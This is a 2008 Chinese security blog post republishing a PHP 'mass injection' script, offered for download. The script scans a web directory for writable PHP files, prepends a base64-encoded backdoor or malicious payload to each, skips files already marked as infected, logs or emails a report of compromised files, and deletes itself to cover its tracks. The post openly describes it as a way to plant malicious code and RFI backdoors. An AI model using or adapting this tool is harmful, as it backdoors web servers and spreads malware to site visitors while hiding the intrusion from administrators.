夜火 & 轨迹's Blog

免费网络资源-网络新闻-计算机技术-网络安全-计算机病毒—15897.com(要我发就齐) 夜火&轨迹共用的Blog

导航

2008-3-3 21:16:2

PHP批量挂马脚本

PHP批量挂马脚本

来源:红狼
作者:f3v3r

批量写入档案脚本...
可以拿来挂马
也能拿来当RFI的后门注入
code都写明的,有需要的请自己看
后门写在$inj里面,要做base64 encode的Polymorphic
不希望这个东西被搞破坏的人拿去玩
懂原理的就自个儿收下吧

<?php
set_time_limit(0);
ignore_user_abort(1);
# PHP Mass Injection Script by f3v3r ver.228
# |1| Look for PHP in directory.|2| Check injected.
# |3| Inject script. |4|Can email report to you.
$inj ='';
$log_email = 0;//change 1 enable, somehow they can trace you by this way.
$email = 'f3v3r@cc.cc';
$log_report = 1;
$filename = '__log.html';
$delete_me = 1;

echo '<title>f3v3r injection toolz</title><center><strong>Defacez aint hack, r00tz r.</strong></center><br>';
$dir = opendir('.');
$site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
while ($file = readdir($dir))
{
if (strstr($file, '.php') && is_writeable($file))
{
$victim = fopen($file, 'r+');
$victim_read = fread($victim, filesize($file));
if (!strstr($victim_read, 'f3v3r'))
{
fclose($victim);
unlink($file);
$new = fopen($file, 'a+');
$new_write = fwrite($new, base64_decode($inj) . $victim_read);
fclose($new);
echo '<strong>[-] injecting : ' . $site . '</strong><br>';
echo '[x] injected: ' . $file . '<br>';
if($log_email) { $log = fopen('__tmp', 'a+'); fwrite($log, '[x] File: ' . getcwd() . $file . '<br>'); fclose($log); }
if($log_report) { $x = fopen($filename, 'a+'); fwrite($x, '[x] File: ' . getcwd() . $file . '\n'); fclose($x); }
}
}
}
closedir($dir);
if($log_email) { $report = file_get_contents('__tmp'); mail($email, "injection report", '<br>f3v3r<br> ' .$report, 'From: f3v3r <f3v3r@cc.cc>'); unlink('__tmp'); echo '[x] Email Report Sent!';}
if($delete_me) { unlink(__file__); }
exit;
?>

MD5 checksum:DE734BDAC73E6ECE8DD3DB40416976E8
#f3v3r

下载:injection.rar (1.52 KB)


« AVG Anti-Virus/Internet Security 8.0.81 Build 1271 Gh0st RAT Beta 2.5 开源-红狼远控 »

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火&轨迹's Blog [ http://www.15897.com/ ]

本文链接地址: http://www.15897.com/blog/post/PHP-piliang-guama-jiaoben.html

Tags: 脚本Script   PHP   源码  
发布:xloong | 分类:安全工具 | 评论:0 | 引用:0| RSS订阅 |浏览:

收藏到网摘

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-Blog 1.8 Spirit Build 80722

Copyright © 夜火 & 轨迹's Blog All Rights Reserved.  深圳SEO SMC气动元件    |   Sitemap   |      |